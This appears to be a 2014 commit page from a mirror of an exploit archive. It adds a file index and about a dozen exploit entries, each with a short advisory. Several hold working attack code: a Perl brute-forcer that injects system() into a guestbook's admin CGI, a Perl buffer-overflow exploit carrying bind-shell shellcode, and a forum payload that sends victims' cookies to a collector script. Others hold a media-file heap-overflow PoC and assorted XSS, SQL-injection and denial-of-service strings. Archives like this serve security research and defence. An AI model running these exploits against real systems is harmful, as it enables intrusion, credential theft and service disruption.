bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 04_11_2014

Browse source
This commit is contained in:
Offensive Security 2014-04-11 04:33:25 +00:00
parent 7493f23711
commit 34d65d4ca3
17 changed files with 480 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

18
files.csv
View file

@ -23461,7 +23461,7 @@ id,file,description,date,author,platform,type,port
26365,platforms/php/webapps/26365.txt,"MySource 2.14 Request.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
26366,platforms/php/webapps/26366.txt,"GLPI 0.83.8 - Multiple Vulnerabilities",2013-06-21,LiquidWorm,php,webapps,0
26367,platforms/windows/local/26367.py,"Adrenalin Player 2.2.5.3 (.asx) - SEH Buffer Overflow",2013-06-21,Onying,windows,local,0
26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0-9.1 mmap/ptrace Privilege Esclation Exploit",2013-06-21,Hunger,freebsd,local,0
26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0-9.1 mmap/ptrace - Privilege Esclation Exploit",2013-06-21,Hunger,freebsd,local,0
26369,platforms/php/webapps/26369.txt,"MySource 2.14 Mail.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
26370,platforms/php/webapps/26370.txt,"MySource 2.14 Date.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
26371,platforms/php/webapps/26371.txt,"MySource 2.14 Span.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
@ -29527,3 +29527,19 @@ id,file,description,date,author,platform,type,port
32765,platforms/multiple/webapps/32765.txt,"csUpload Script Site - Authentication Bypass",2014-04-09,Satanic2000,multiple,webapps,0
32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek 'cs.html' URI Redirection Vulnerability",2009-01-28,buzzy,php,webapps,0
32767,platforms/php/webapps/32767.txt,"QuickCms 5.4 - Multiple Vulnerabilites",2014-04-09,"Shpend Kurtishaj",php,webapps,0
32768,platforms/cgi/webapps/32768.pl,"PerlSoft Gästebuch Version: 1.7b 'admincenter.cgi' Remote Command Execution Vulnerability",2009-01-29,Perforin,cgi,webapps,0
32769,platforms/php/remote/32769.php,"PHP 5.2.5 'mbstring.func_overload' Webserver Denial Of Service Vulnerability",2009-01-30,strategma,php,remote,0
32770,platforms/php/webapps/32770.txt,"E-Php B2B Trading Marketplace Script Multiple Cross Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0
32772,platforms/windows/dos/32772.py,"Nokia Multimedia Player 1.1 '.m3u' File Heap Buffer Overflow Vulnerability",2009-02-03,zer0in,windows,dos,0
32773,platforms/php/webapps/32773.txt,"Simple Machines Forum <= 1.1.7 '[url]' Tag HTML Injection Vulnerability",2009-02-03,Xianur0,php,webapps,0
32774,platforms/multiple/dos/32774.txt,"QIP 2005 Malformed Rich Text Message Remote Denial of Service Vulnerability",2009-02-04,ShineShadow,multiple,dos,0
32776,platforms/hardware/remote/32776.txt,"Cisco IOS 12.4(23) HTTP Server Multiple Cross Site Scripting Vulnerabilities",2009-02-04,Zloss,hardware,remote,0
32777,platforms/php/webapps/32777.html,"MetaBBS 0.11 Administration Settings Authentication Bypass Vulnerability",2009-02-04,make0day,php,webapps,0
32778,platforms/windows/local/32778.pl,"Password Door 8.4 Local Buffer Overflow Vulnerability",2009-02-05,b3hz4d,windows,local,0
32779,platforms/php/webapps/32779.txt,"Ilch CMS 1.1 'HTTP_X_FORWARDED_FOR' SQL Injection Vulnerability",2009-02-06,Gizmore,php,webapps,0
32780,platforms/linux/remote/32780.py,"PyCrypto ARC2 Module Buffer Overflow Vulnerability",2009-02-07,"Mike Wiacek",linux,remote,0
32781,platforms/multiple/remote/32781.txt,"PyBlosxom 1.6.3 Atom Flavor Multiple XML Injection Vulnerabilities",2009-02-09,"Nam Nguyen",multiple,remote,0
32782,platforms/php/webapps/32782.txt,"FotoWeb 6.0 Login.fwx s Parameter XSS",2009-02-09,"Stelios Tigkas",php,webapps,0
32783,platforms/php/webapps/32783.txt,"FotoWeb 6.0 Grid.fwx search Parameter XSS",2009-02-09,"Stelios Tigkas",php,webapps,0
32784,platforms/php/webapps/32784.txt,"glFusion 1.1 Anonymous Comment 'username' Field HTML Injection Vulnerability",2009-02-05,"Bjarne Mathiesen Schacht",php,webapps,0
32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0

Can't render this file because it is too large.

108
platforms/cgi/webapps/32768.pl Executable file
View file

@ -0,0 +1,108 @@
source: http://www.securityfocus.com/bid/33525/info
PerlSoft ¤stebuch is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input. Note that an attacker must have administrative access to the script to exploit this issue.
Successful attacks can compromise the affected application and possibly the underlying computer.
PerlSoft ¤stebuch 1.7b is vulnerable; other versions may also be affected.
#!/usr/bin/perl
=pod
Typ: Bruter & RCE
Name: PerlSoft GB Pwner
Affected Software: PerlSoft Gästebuch Version: 1.7b
Coder/Bugfounder: Perforin
Visit: DarK-CodeZ.org
Note: RCE ist only 1 time possible, do not waste your command!
=cut
use strict;
use warnings;
use diagnostics;
use LWP::Simple;
use LWP::Simple::Post qw(post post_xml);
my ($url,$user,$wordlist,$error_counter,$word,$anfrage);
my ($falsch,$richtig,$entry,$rce,$send,$crypted);
my (@response,@rcesend,@array);
if (@ARGV < 4) { &fail; }
($url,$user,$wordlist) = (@ARGV);
$falsch = '<tr><td align=center><Font color="000000" FACE="Arial">Nur Administratoren mit g&uuml;ltigen Benutzerdaten haben Zugang in das Admin-Center!</font></td></tr>';
$richtig = '<tr><td bgcolor=#E0E0E0 align=center><B><Font color="000000" FACE="Arial">G&auml;stebuch Vorlage - Einstellen</font></B></td></tr>';
if ($url !~ m/^http:\/\//) { &fail; }
if ($wordlist !~ m/\.(txt|list|dat)$/) { &fail; }
print <<"show";
--==[Perforins PerlSoft GB Pwner]==--
[+] Attack: $url
[+] User: $user
[+] Wordlist: $wordlist
show
open(WordList,"<","$wordlist") || die "No wordlist found!";
foreach $word (<WordList>) {
chomp($word);
$crypted = crypt($word,"codec");
$anfrage = $url.'?sub=vorlage&id='.$user.'&pw='.$crypted;
@array = get($anfrage) || (print "[-] Cannot connect!\n") && exit;
foreach $entry (@array) {
if ($entry =~ m/$richtig/i) {
print "\n[+] Password cracked: "."$crypted:$word"." !\n\n";
if ($ARGV[3] =~ m/yes/i ) {
print <<"RCE";
[+] Remote Command Execution possible!
[~] Note: Only _1_ time exploitable, do not waste it!
[+] Please enter your Command!
RCE
chomp($rce = <STDIN>);
$rce =~ s/>/\"\.chr(62)\.\"/ig;
$rce =~ s/</\"\.chr(60)\.\"/ig;
$rce =~ s/\|/\"\.chr(124)\.\"/ig;
$rce =~ s/&/\"\.chr(38)\.\"/ig;
$rce =~ s/\//\"\.chr(47)\.\"/ig;
$rce =~ s/-/\"\.chr(45)\.\"/ig;
$send = 'loginname='.$user.'&loginpw='.$word.'&loginname1='.$user.'";system("'.$rce.'");print "h4x&loginpw1='.$word.'&loginpw2='.$word.'&id='.$user.'&pw='.$crypted.'&sub=saveadmindaten';
@response = post($url, $send);
@rcesend = get($url) || (print "[-] Cannot connect!\n") && exit;
print <<"END";
[+] Command executed!
---====[www.vx.perforin.de.vu]====---
END
exit;
} else { (print "---====[www.vx.perforin.de.vu]====---\n") and exit; }
} elsif ($entry =~ m/$falsch/i) {
$error_counter++;
print "[~] Tested ".$error_counter.": "."$crypted:$word"."\n";
}
}
}
close(WordList);
print "[-] Could not be cracked!\n";
exit;
sub fail {
print <<"CONFIG";
+-------------------+
| |
| PerlSoft GB Pwner |
| v0.1 |
| |
+-------------------+-----[Coded by Perforin]-----------------------------+
| |
| brute.pl http://www.example.com/cgi-bin/admincenter.cgi admin wordlist.txt yes |
| brute.pl http://www.example.com/cgi-bin/admincenter.cgi admin wordlist.txt no |
| |
| yes = Remote Command Execution |
| no = No Remote Command Execution |
| |
+-------------------------[vx.perforin.de.vu]-----------------------------+
CONFIG
exit;
}

11
platforms/hardware/remote/32776.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/33625/info
Cisco IOS HTTP Server is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. The attacker may also perform cross-site request-forgery attacks on the same scripts and parameters. Other attacks may also be possible.
Note that this issue may be related to an issue described in BID 33260 (Cisco IOS HTTP Server Multiple Cross Site Scripting Vulnerabilities).
Cisco IOS 12.4(23) is vulnerable; other versions may also be affected.
http://www.example.com/level/15/exec/-/"><body onload=alert("bug")> http://www.example.com/exec/"><body onload="alert('bug');">

129
platforms/linux/remote/32780.py Executable file
View file

@ -0,0 +1,129 @@
source: http://www.securityfocus.com/bid/33674/info
PyCrypto (Python Cryptography Toolkit) is prone to a buffer-overflow vulnerability because it fails to adequately verify user-supplied input.
Successful exploits may allow attackers to execute arbitrary code in the context of applications using the vulnerable module. Failed attempts may lead to a denial-of-service condition.
# -*- coding: utf-8 -*-
#
# SelfTest/Cipher/ARC2.py: Self-test for the Alleged-RC2 cipher
#
# =======================================================================
# Copyright (C) 2008 Dwayne C. Litzenberger <dlitz@dlitz.net>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# =======================================================================
#
"""Self-test suite for Crypto.Cipher.ARC2"""
__revision__ = "$Id$"
from common import dict # For compatibility with Python 2.1 and 2.2
import unittest
# This is a list of (plaintext, ciphertext, key[, description[, extra_params]]) tuples.
test_data = [
# Test vectors from RFC 2268
# 63-bit effective key length
('0000000000000000', 'ebb773f993278eff', '0000000000000000',
'RFC2268-1', dict(effective_keylen=63)),
# 64-bit effective key length
('ffffffffffffffff', '278b27e42e2f0d49', 'ffffffffffffffff',
'RFC2268-2', dict(effective_keylen=64)),
('1000000000000001', '30649edf9be7d2c2', '3000000000000000',
'RFC2268-3', dict(effective_keylen=64)),
('0000000000000000', '61a8a244adacccf0', '88',
'RFC2268-4', dict(effective_keylen=64)),
('0000000000000000', '6ccf4308974c267f', '88bca90e90875a',
'RFC2268-5', dict(effective_keylen=64)),
('0000000000000000', '1a807d272bbe5db1', '88bca90e90875a7f0f79c384627bafb2',
'RFC2268-6', dict(effective_keylen=64)),
# 128-bit effective key length
('0000000000000000', '2269552ab0f85ca6', '88bca90e90875a7f0f79c384627bafb2',
"RFC2268-7", dict(effective_keylen=128)),
('0000000000000000', '5b78d3a43dfff1f1',
'88bca90e90875a7f0f79c384627bafb216f80a6f85920584c42fceb0be255daf1e',
"RFC2268-8", dict(effective_keylen=129)),
# Test vectors from PyCrypto 2.0.1's testdata.py
# 1024-bit effective key length
('0000000000000000', '624fb3e887419e48', '5068696c6970476c617373',
'PCTv201-0'),
('ffffffffffffffff', '79cadef44c4a5a85', '5068696c6970476c617373',
'PCTv201-1'),
('0001020304050607', '90411525b34e4c2c', '5068696c6970476c617373',
'PCTv201-2'),
('0011223344556677', '078656aaba61cbfb', '5068696c6970476c617373',
'PCTv201-3'),
('0000000000000000', 'd7bcc5dbb4d6e56a', 'ffffffffffffffff', 'PCTv201-4'),
('ffffffffffffffff', '7259018ec557b357', 'ffffffffffffffff', 'PCTv201-5'),
('0001020304050607', '93d20a497f2ccb62', 'ffffffffffffffff', 'PCTv201-6'),
('0011223344556677', 'cb15a7f819c0014d', 'ffffffffffffffff', 'PCTv201-7'),
('0000000000000000', '63ac98cdf3843a7a',
'ffffffffffffffff5065746572477265656e6177617953e5ffe553',
'PCTv201-8'),
('ffffffffffffffff', '3fb49e2fa12371dd',
'ffffffffffffffff5065746572477265656e6177617953e5ffe553',
'PCTv201-9'),
('0001020304050607', '46414781ab387d5f',
'ffffffffffffffff5065746572477265656e6177617953e5ffe553',
'PCTv201-10'),
('0011223344556677', 'be09dc81feaca271',
'ffffffffffffffff5065746572477265656e6177617953e5ffe553',
'PCTv201-11'),
('0000000000000000', 'e64221e608be30ab', '53e5ffe553', 'PCTv201-12'),
('ffffffffffffffff', '862bc60fdcd4d9a9', '53e5ffe553', 'PCTv201-13'),
('0001020304050607', '6a34da50fa5e47de', '53e5ffe553', 'PCTv201-14'),
('0011223344556677', '584644c34503122c', '53e5ffe553', 'PCTv201-15'),
]
class BufferOverflowTest(unittest.TestCase):
# Test a buffer overflow found in older versions of PyCrypto
def setUp(self):
global ARC2
from Crypto.Cipher import ARC2
def runTest(self):
"""ARC2 with keylength > 128"""
key = "x" * 16384
mode = ARC2.MODE_ECB
self.assertRaises(ValueError, ARC2.new, key, mode)
def get_tests(config={}):
from Crypto.Cipher import ARC2
from common import make_block_tests
tests = make_block_tests(ARC2, "ARC2", test_data)
tests.append(BufferOverflowTest())
return tests
if __name__ == '__main__':
import unittest
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4 expandtab:

11
platforms/multiple/dos/32774.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/33609/info
QIP 2005 is prone to a remote denial-of-service vulnerability.
Exploiting this issue may allow attackers to cause the application to hang and consume excessive computer resources, denying service to legitimate users.
NOTE: This issue may occur in a third-party component used by QIP 2005, but this has not been confirmed.
This issue affects QIP 2005 build 8082; other versions may also be vulnerable.
{\rtf\pict\&&}

10
platforms/multiple/remote/32781.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/33676/info
PyBlosxom is prone to multiple XML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied XML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
PyBlosxom 1.4.3 is vulnerable; other versions may also be affected.
http://host/path/%3Ccool%3E?flav=atom

10
platforms/php/remote/32769.php Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/33542/info
PHP is prone to a denial-of-service vulnerability because it fails to limit global scope for certain settings relating to Unicode text operations.
Attackers can exploit this issue to crash the affected webserver, denying service to legitimate users.
<?php
$v = 'Òîâà å òåñò|test.php';
print substr($v,0,strpos($v,'|'));
?>

8
platforms/php/webapps/32770.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/33551/info
E-Php B2B Trading Marketplace Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/b2b/signin.php?errmsg=%3Cscript%3Ealert(1);%3C/script%3E
http://www.example.com/b2b/gen_confirm.php?errmsg=%3Cscript%3Ealert(1);%3C/script%3E

7
platforms/php/webapps/32773.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33595/info
Simple Machines Forum is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
[center][size=14pt][url=][/url][/size] [url=javascript:document.write('<iframe width="0%" height="0%" src="http://www.example.com/cookiestealer.php?cookie=' + document.cookie +'"> frameborder="0%">');][img]http://www.example2.com/intl/es_mx/images/logo.gif[/img][/center] PHP Cookie Stealer: <?php $cookie = $_GET['cookie']; $handler = fopen('cookies.txt', 'a'); fwrite($handler, $cookie."\n"); ?> [url=javascript:document.write(unescape(%3Cscript+src%3D%22http%3A%2F%2Fwww.example.com%2Fexploit.js%22%3E%3C%2Fscript%3E))][img]http://www.example2.com/sample.png[/img][/center]

9
platforms/php/webapps/32777.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33626/info
MetaBBS is prone to a vulnerability that lets attackers modify arbitrary user passwords because it fails to adequately secure access to administrative functionality.
Exploiting this issue may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
MetaBBS 0.11 is vulnerable; other versions may also be affected.
<form method="post" action="http://www.example.com/metabbs/admin/settings/?"> <dl> <dt><label for="settings_admin_password">Admin password</label></dt> <dd><input id="settings_admin_password" size="20" name="settings[admin_password]" value="" type="password" /></dd> <dt><label for="settings_global_header">Header file</label></dt> <dd><input id="settings_global_header" size="30" name="settings[global_header]" value="" type="text" /></dd> <dt><label for="settings_global_footer">Footer File</label></dt> <dd><input id="settings_global_footer" size="30" name="settings[global_footer]" value="" type="text" /></dd> <dt><label for="settings_theme">Site theme</label></dt> <dd><input id="settings_theme" size="30" name="settings[theme]" value="" type="text" /></dd> <dt><label for="settings_default_language">Language</label></dt> <dd> <dd><input id="ettings_default_language" size="30" name="settings[default_language]" value="" type="text" /></dd> <input name="settings[always_use_default_language]" value="0" type="hidden" /><input id="settings_always_use_default_language" name="settings[always_use_default_language]" value="1" type="checkbox" /> <label for="settings_always_use_default_language">Always Use Default Language</label> </dd> <dt><label for="settings_timezone">TimeZone</label></dt> <dd> <dd><input id="settings_timezone" size="30" name="settings[timezone]" value="" type="text" /></dd> </dl> <h2>Advanced Setting</h2> <p><input name="settings[force_fancy_url]" value="0" type="hidden" /> <input id="settings_force_fancy_url" name="settings[force_fancy_url]" value="1" type="checkbox" /> <label for="settings_force_fancy_url">Fancy URL Force Apply</label></p> <p><input type="submit" value="OK" /></p> </form>

12
platforms/php/webapps/32779.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/33665/info
Ilch CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Ilch CMS 1.1L and prior versions are vulnerable.
The following proof of concept X-Forward-For header is available:
http://www.example.com', (select `pass` from prefix_user WHERE `id` > 0
ORDER BY `id` LIMIT 1)) /*

9
platforms/php/webapps/32782.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33677/info
FotoWeb is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
FotoWeb 6.0 is vulnerable; other versions may also be affected.
http://www.example.com/fotoweb/cmdrequest/Login.fwx?s="><script>alert(â??0wn3dâ?<3F>)</script>

10
platforms/php/webapps/32783.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/33677/info
FotoWeb is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
FotoWeb 6.0 is vulnerable; other versions may also be affected.
http://www.example.com/fotoweb/Grid.fwx?&search=<script>alert("0wn3dâ?<3F>)</script> and (FQYFT
contains(JPEG))

23
platforms/php/webapps/32784.txt Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/33683/info
glFusion is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
glFusion 1.1.0 and 1.1.1 are vulnerable; other versions may also be affected.
POST /comment.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-
application, */*
Accept-Language: da
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding:
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: www.glfusion.org
Pragma: no-cache
Connection: Keep-Alive
sid=fileid_20&pid=0&type=filemgmt&_glsectoken=&comment=&uid=1&username=Anonymous+Use
r%22%3e%3csCrIpT%3ealert(1234)%3c%2fsCrIpT%3e&title=Hello&comment=Hello&comment_h
tml=Hello&postmode=html&captcha=47TXJC&csid=49816d4bcd4b&mode=Submit+Comment

13
platforms/php/webapps/32785.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/33689/info
Bitrix Site Manager is prone to multiple input-validation vulnerabilities:
- An authentication-bypass vulnerability
- A cross-site scripting vulnerability
An attacker may leverage these issues to gain unauthorized access to the affected application, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, and steal cookie-based authentication credentials. Other attacks are also possible.
Login: &nbsp;
Password: 123456
http://www.example.com/bitrix/help/en/index.html?page=javascript:alert(%27XSS%27);

40
platforms/windows/dos/32772.py Executable file
View file

@ -0,0 +1,40 @@
source: http://www.securityfocus.com/bid/33586/info
Nokia Multimedia Player is prone to a heap-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions.
Nokia Multimedia Player 1.1 is vulnerable; other versions may also be affected.
# Nokia Multimedia Player version 1.1 .m3u Heap Overflow PoC exploit
# by 0in aka zer0in from Dark-Coders Group! [0in.email[at]gmail.com] / 0in[at]dark-coders.pl]
# http://www.Dark-Coders.pl
# Special thx to doctor ( for together analyse this shi*) and sun8hclf ( for tell me.. "to unicode.")
# Greetings to: Die,m4r1usz,cOndemned (;> ?),joker,chomzee,TBH
# Nokia Multimedia Player is a element of Nokia PC Suite packet.
# DOWNLOAD:http://europe.nokia.com/A4144905
# Vuln:
# This is heap overflow vuln, we can control EAX & EDI registers
# (on my Windows XP sp3) with UNICODE chars...
# DEBUG:
# "Access violation when reading [00130013]"
# EAX 00130013 <- !
# EDX 00000000
# EBX 00970000
# ESP 0012F96C
# EBP 0012FB8C
# ESI 00AD26B0
# EDI 00900011 <- !
# EIP 7C910CB0 ntdll.7C910CB0
#!/usr/bin/python
eax="\x13\x13" # eax : 00130013
edi="\x11\x90" # edi : 00900011
buf="F"*261
buf+=edi+eax
buf+="B"*235
file_name="spl0.m3u"
ce=buf
f=open(file_name,'w')
f.write(ce)
f.close()
print 'PoC created!'

53
platforms/windows/local/32778.pl Executable file
View file

@ -0,0 +1,53 @@
source: http://www.securityfocus.com/bid/33634/info
Password Door is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Password Door 8.4 is vulnerable; other versions may also be affected.
#!usr/bin/perl
#
#--------------APA Center of Yazd University----------------------------------
# http://www.ircert.ir
#
# Author : b3hz4d (Seyed Behzad Shaghasemi)
# SITE : WWW.DeltaHacking.Net
# Password Door 8.4 Local Buffer Overflow Exploit
# Tested in Windows Pro Sp2 (English)
# Product web page: http://www.toplang.com/passworddoor.htm
# Gr33tz to : Str0ke, Dr.Trojan, Cru3l.b0y, PLATEN, Snake, l0pht & all iranian hackers
#-----------------------------------------------------------------------------
$junk = "A"x 601;
$ret = "\xb3\x8d\x95\x7c"; # jmp esp from ntdll.dll
$nop = "\x90"x 100;
# win32_bind - LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85".
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19".
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05".
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0".
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74".
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15".
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14".
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53".
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce".
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf".
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb".
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18".
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6".
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16".
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f".
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c".
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18".
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f".
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8".
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e".
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f".
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27".
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2".
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a".
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
$exploit = $junk.$ret.$nop.$shellcode;
system("PassDoor.exe",$exploit);